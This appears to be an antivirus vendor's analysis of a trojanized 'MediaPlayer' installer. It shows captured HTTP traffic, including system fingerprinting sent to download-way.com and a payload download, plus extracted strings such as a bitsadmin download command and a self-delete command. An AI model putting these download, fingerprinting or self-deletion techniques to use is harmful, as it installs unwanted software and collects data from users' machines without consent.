.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTcz
kc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP C
ore 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF x
mlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Des
cription rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:x
mpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.co
m/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xm
pMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0kVL2SOnaBGzM82AJcrWkuDanxR0ra8f0cykqeuKfMoD75eZmEx2hQ==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....t.,....e........n
s.............n..mB.............FBm.s.C.............AB.DE.............
DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..
a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D
..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J
.... ^[email protected]..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y........
..Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._
9p........{.........z... {[[email protected].!. f.".%j..
.#bh#._....[....@.)[email protected]..[[email protected].`.....|...h..
..^[email protected]..`...S.........o....z....7......9.!b.!...Vji. .... ....`&l
t;A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........
a...&`...6.l.bP0....;n._. [email protected]......,....k......!h4
....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-
t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LanaVVYEVn3lXNi5MFBKdcam9x24x111oxFaOberXB-tFe7IvO33vQ==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww
?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*[email protected]<.A)[email protected]
.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}.
.o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C
...H.KL.P..................[._&. ...........................|.~......(
.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m..
.......I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8
(.,A.K......C.I%.*..2?.Hgug)[email protected]>.F=.D6.;...'.)*.(*./-
.-?.=-..:.C../<.C...5.<[email protected]:.A,.2;.B;.BQ.\...O.Tkyl/.
3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K
#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|....
.....hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c
011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf=
"hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description 
rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef
="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns
.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E41
1B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150
F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 38013
Connection: keep-alive
Date: Wed, 09 Dec 2015 16:41:49 GMT
Content-Disposition: attachment; filename="left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "69024df30fda549f6ed20e0a65a7face"
Accept-Ranges: bytes
Server: AmazonS3
Age: 43706
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LBSU4KwL0l_MWmoVqRuvp8JV3C4H52Je9rOg2soOoU04syQnF7d68Q==
.PNG........IHDR.......e......89.....gAMA....7.......pHYs.......... ..
....tEXtSoftware.Adobe ImageReadyq.e<....IDATx^....l.U.v..........i
F...Y.Vl....F.3..,.$.....8...@. .....l..A.6...I....d.1Y6..4...... #i.3
.73..{.]..]U.....s......]..._.~........>{.........u&:...m...C.l.Ls.
a6.[6L.{..8B...US1...~\}a.T....ye.....cx..U..u=c..l..B,...a.<(.....
../].b}!:9.Ee....N.........P~?..^.T...w.Y.......q.......Js......I..P..
./...X........t.:.O.>M..q...fso.q3..6n$....].1.}}....,......4a}..i.
q.]....p.D....w...$.CR.....(.v}.Q.;-8..#.v.........9W...>..0}...ar.
%........T*..;n}..~...G_.h..z...h.S.5..ad;6..X.fO.>...L?..s......I.
g)......e...g.,.N..F.P.d......L..b.....~..1,...PB.='.w...$....7.g67&..
...U.m>..Z.1L....../...3....j.....b)k..v....8.{e.....D\..<..w...
$..TV..U..1#VG:..F..a...FZ..:.\....J.|s..\1[....R...r.).T.7).g.|.>.
o..1.p.7..!..TW...k...e..f. ./.O..k6Pfk....SH..G..,.....{.\......?....
3.O....e.......c.2.?.w .)..r........,...qe`\_..[.a..i.TW.....=.L...yP\
:.3q\......lX1.3.:....L.%...g.H?...6..|}....K([[email protected]}.
.S~. *.......Fc..[..BE..V.....fq.Q..7.......}:d}...(...D.h(.U.:.e..iZ.
././hP\:,.....-.|}.....}.-...<.@...*v......=..t ....|<.9<..0}
.,a.t.B..z}.;..,.w..4..D2j\.&.bc...(V1!..,a...4......c....R5....M.....
...66........j.,&...o...I...Vx..7...'...O...R[|s...........`...$:L....
c-....Fh...Yo})..r.O.\.p......>[email protected]\...V...b{.{..J...
..vk..0]7.)3..!.......!...D. ....7...6j.=..O..s..bZ.[6............k.p.
7....FX.....q..Y..Q.l\:l...V..a.....<.}.y2.1..p*;.....Y..q'..{.
<<< skipped >>>


GET /V31/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69260
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:00:05 GMT
Last-Modified: Thu, 26 Nov 2015 15:03:49 GMT
ETag: "f96a7acecd2cfb0d4f3cfca235763504"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 3009
X-Cache: Hit from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 76rLksTr2aHXgtjcgEIqqSLYx8FbPDNzqvKkh14XRZ4mmm5ypuNJNA==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();..va
r g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;.
.var g_possibleComps = [];..var g_reportedComps = [];..var g_removedCo
mps = [];..var g_notCompatibleWithUpdaterComps = ['LootFindKP'];..var 
g_postponedComps = ['updater','SHAREit'];..var g_disable_updater = fal
se;..function LogMessage(message) {..    try {..        g_ami.Log(mess
age);..    }..    catch (excpt) {..    }..}..function IsDeclined(name)
 {..    var declined = 0;..    for (var i = 0; i < g_removedComps.l
ength; i  ) {..        if (g_removedComps[i] == name) {..            d
eclined = 1;..            break;..        }..    }..    return decline
d;..}..function UpdateSkipStatus(sn) {..    if (g_testa && !ArrayConta
ins(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayCont
ains(g_notest1, sn)) {..        if (g_testa.constructor != Array || Ar
rayContains(g_testa, sn)) {..            g_ami.WriteProfileString(g_te
stf, '', sn, 'S');..            g_reportedComps.push(sn);..        }..
    }..}..function ShortNameFromName(name) {..    for (c = 0; c < g
_comps.length; c  ) {..        if (g_comps[c].name == name) {..       
     return g_comps[c].sn;..        }..    }..    return name;..}..fun
ction UpdateComponentsStatus() {..    LogMessage('UpdateComponentsStat
us function started');..    for (var j = 0; j < g_possibleComps.len
gth; j  ) {..        if (g_possibleComps[j].sn == 'updater') {..      
      continue;..        }..        if (g_possibleComps[j].sel !==
<<< skipped >>>


GET /cmu9yf4p HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/cmu9yf4p
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Location: hXXp://uploaded.net/file/cmu9yf4p..Vary: Accept-Encoding..



POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&Sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=MediaPlayer__15159_il35679.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=MediaPlayer__15159_il35679&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAxMAA=&netfs=3&ts=1449723017&ver=1.1.5.55
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Thu, 10 Dec 2015 04:50:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">.<html>.    <head>.        <meta
 http-equiv="content-type" content="text/html; charset=UTF-8" /> . 
       <title>MediaPlayer</title>.        <base href="h
ttp://VVV.download-way.com:80/index.php" />.<link rel="styleshee
t" type="text/css" href="hXXp://cdn2.downloadsoup.com/9ee1efd2-b9b2-40
3f-8f9a-5fc856fa00a3/main.css" />        <script type="text/java
script" src="hXXp://cdn1.downloadsoup.com/V31/amipb.js"></script
>.        <script type="text/javascript">.var g_r__capp='Medi
aPlayer';..            var g_amiobj = '', g_ami, g_updb = false, g_clo
se = '1', g_additional_offer_list = '1';.            var g_finish_inst
all_button = '1';.            var g_popup_install_all = '1';.         
   var g_eula = 'QnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b
25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCB
NYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZXJ3aXNlIHVzaW5nIHRoZSBTb2Z0d2FyZ
SwgeW91IGFncmVlIHRvIGJlIGJvdW5kIGJ5IHRoZSB0ZXJtcyBvZiBJbnN0YWxsUGF0aCB
JbnN0YWxsIE1hbmFnZXIgaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vZXVsYS5odG1sI
ChFVUxBKSwgaXRzIGh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCA
oUHJpdmFjeSBQb2xpY3kpIGFuZCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS90ZXJtc
y5odG1sIChUZXJtcyBvZiBTZXJ2aWNlKS4gRm9yIGFueSBhZGRpdGlvbmFsIGluZm9ybWF
0aW9uIG9uIEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlciB5b3UgY2FuIHZpc2l0IEluc
3RhbGxQYXRoJ3Mgd2Vic2l0ZSBhdCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS8
<<< skipped >>>

POST /finalize.php HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.download-way.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 381
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=0&_ver=1.1.5.55&_p=1&_s=20&_cc=UA&_cid=15159&_psb=0&_cnt=77cf2e0adca2896b80870fc402dc2b9b&_instid=l35679&_brw=ie&_fc=216&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_MediaPlayer=0&r_updater=0.01&r_NationZoom=1&r_OperaRUnew=2&r_AmigoIM=5&r_AnySend=1&r_OperaWW=2&r_PPSvideoPlayer=1&MediaPlayer=3&updater=2&NationZoom=1&OperaRUnew=1&AmigoIM=1&AnySend=1&OperaWW=1&PPSvideoPlayer=1
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 10 Dec 2015 04:50:13 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 3285
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>MediaPlayer</comps><
short_name>MediaPlayer</short_name><must_show>0</mus
t_show><bdy>CiAgICAgICAgCjxkaXYgaWQ9ImFtaV9kaXNwbGF5X2JvZHkiP
goJPGRpdiBpZD0iYW1pX2xlZnRfaW1hZ2UiPgkKCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5
rcyI CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kua
HRtbCAiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Qcml2YWN5IFB
vbGljeTwvYT48YnIgLz4KCQkJPGEgaHJlZj0iaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb
20vaW5kZXguaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkh
lbHA8L2E PGJyIC8 CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL
2NvbnRhY3QtdXMuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGU
iPkNvbnRhY3QgdXM8L2E CgkJPC9kaXY Cgk8L2Rpdj4KCTxkaXYgaWQ9ImFtaV9ib2R5X
3RleHQiPgoJCTxkaXYgaWQ9ImFtaV9kZWNfZGl2Ij4JCgkJCTxzcGFuIGlkPSJhbWlfZGV
jX3RpdGxlIj5XZWxjb21lIHRvIHRoZSBWTEMgTWVkaWEgUGxheWVyIFNldHVwIFdpemFyZ
Dwvc3Bhbj4KCQkJPHAgaWQ9ImFtaV9kZWNfaW5mbyI CgkJCSAgRm9sbG93IHRoZSBvbi1
zY3JlZW4gb3V0bGluZWQgdGhpcyB3aXphcmQgdG8gaW5zdGFsbCB0aGUgbmV3IHZlcnNpb
24gb2YgVkxDIE1lZGlhIFBsYXllcgoJCQkgIGFuZCBiZW5lZml0IGZyb20gYWxsIHRoZSB
sYXRlc3QgZmVhdHVyZXMgYW5kIHVwZGF0ZXMgVkxDIE1lZGlhIFBsYXllciBoYXMgdG8gb
2ZmZXIuCgkJCTwvcD4KCQkgIDxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlBsZWFzZSB0byB
jb250aW51ZSB3aXRoIHRoZSBpbnN0YWxsYXRpb24gc2VsZWN0IHlvdXIgZGVzaXJlZCBvc
HRpb246PC9zcGFuPgoJCTwvZGl2PgoJCQkJCgkJPGRpdiBpZD0iZF9hbWlfTWVkaWF
<<< skipped >>>


GET /dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 HTTP/1.1
Accept: */*
Host: fra-7m22-stor05.uploaded.net
User-Agent: Setup Factory 9.0
Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: application/octet-stream
Content-Length: 2861977
Last-Modified: Wed, 09 Dec 2015 20:37:36 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="b.exe"
ETag: "56689110-2bab99"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2...\...\.
..\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\...
......PE..L...,-.T.................X...........).......p....@.........
.................P......J6....@.................................<..
.d........n...................0.......................................
...@............p..x............................text....W.......X.....
............. ..`.rdata.......p...0...\..............@[email protected]....
[email protected]..................@[email protected]
[email protected].................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U...X......... [email protected].
SVW.}[email protected]@.P..hq@........`........V......SP.......Pp@..
..W..;.}[email protected][email protected]...
@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P..
...u>.......6......P.....~(......:u....~....P......P......P........
[email protected]@[email protected];[email protected].
[email protected]@........u....M._..^3.[.........V..W3.h..
[email protected].....<[email protected]
<<< skipped >>>


GET /down/kabo/apps.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: bumpacpacba.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.45
Content-Type: text/html
Content-Length: 32
Date: Thu, 10 Dec 2015 04:50:04 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: close
EDkh679oKhVnvEc2tJ4F2hCvvh3Af0tl..

The Trojan connects to the servers at the folowing location(s):

MediaPlayer__15159_il35679.exe_1884:

.text
`.rdata
@.data
.rsrc
@.reloc
109 9 59
17 85 54 84 79 51 17 115
19 89 52 85 120 58 58 67 63
18 116 19 2 9 120 49 92 54
18 121 28
18 85 46 117 120
18 85 46 97 82 46 48 92
25 95 59 85 114 53 58 94 27
25 95 59 85 114 53 58 94 13
59 68 62 93 87 120 49 92 54
59 67 54 94 84 61 32 64
58 92 63 2 9 120 49 92 54
7 85 59 85 125 63 57 85
7 85 54 84 90 37 48 116 25
38 66 44
0 99 31 99 8 100 123 84 54 93
2 66 51 69 94 16 60 92 63
34 66 49 66 79
GetProcessWindowStation
operator
KERNEL32.dll
USER32.dll
ole32.dll
RegCloseKey
RegOpenKeyW
ADVAPI32.dll
GetProcessHeap
GetCPInfo
0NÙ2n:
~S%uga
{.OC]]
5q.DW
9N%uE
~S%ua
3.kj=
s'.kC
#^.BA
}`.GQ
~BL<R%X
.AweI
bNzg .Gf?
%9sfkh,A
%9sfkh,_
U.ji'
%ssP{
%SI8{n
yp{.nf
K.kXhgw?j6ww
0>.Aq
.GQ<B0
C%uv(R
l.OC0
II.sf
Q_.zhA
%Sx\h
E%x$M
F%xlN
%UeAW
.GVTL(
7Z.Es&X
G.Se(
.kbE D~*Z$
RM%Cq
..HaM
%X%hbM
.CQ}k
e^/%d&
~0.ad$
}~2^</4_
%UuL*
.hp%(
-mSQl
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
103 60 97
109 37 20
112 59 96
116 44 119 94 116 115 98
26 1 94 107 93 86 73 23
116 12 87 126 116 83 66
119 52 113 94
@mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe

MediaPlayer__15159_il35679.exe_1884_rwx_00B20000_0008C000:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
PSShd'
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
2Ub46wAG7ILlcuNK7PAECPiT5WjjR/rwABTCpMxN Ezw6yEC7JTQUOR12 cHC/GV3E3Wevb6Gwu odZT7kzs7A==
w1ra8xAl65PNUORq9voUDPuD
2Uzw zML a7NWudk  wEBvmC7g==
xkbx9B4J cffUPgJ7u0YBPuUylr5CertEgK iN8fr02kvwcG7ILXS/kJ7fYNAr7C3ROqWfvxEw7wgJlM41P7v1IDlA==
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
yX3/7Bw0/Y/cW/9F 9cWCfqL3E2wE93tEgbqgvBR V3/8xsz/5TSH8xI9/NXE/HH2FvuCertHgD5gssFqgzmlQ==
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
cousins.epoxied.1 = s 'Inst Class'
CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'
cousins.epoxied = s 'Inst Class'
CurVer = s 'cousins.epoxied.1'
ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'
ProgID = s 'cousins.epoxied.1'
VersionIndependentProgID = s 'cousins.epoxied'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalled
Created by MIDL version 7.00.0555 at Wed Dec 09 15:16:39 2015
0
0I0Y0v0
0*0*12181
)01070>0
? ?(?0?8?
9 9<9@9`9
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.55
setup.exe
download-way.com


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

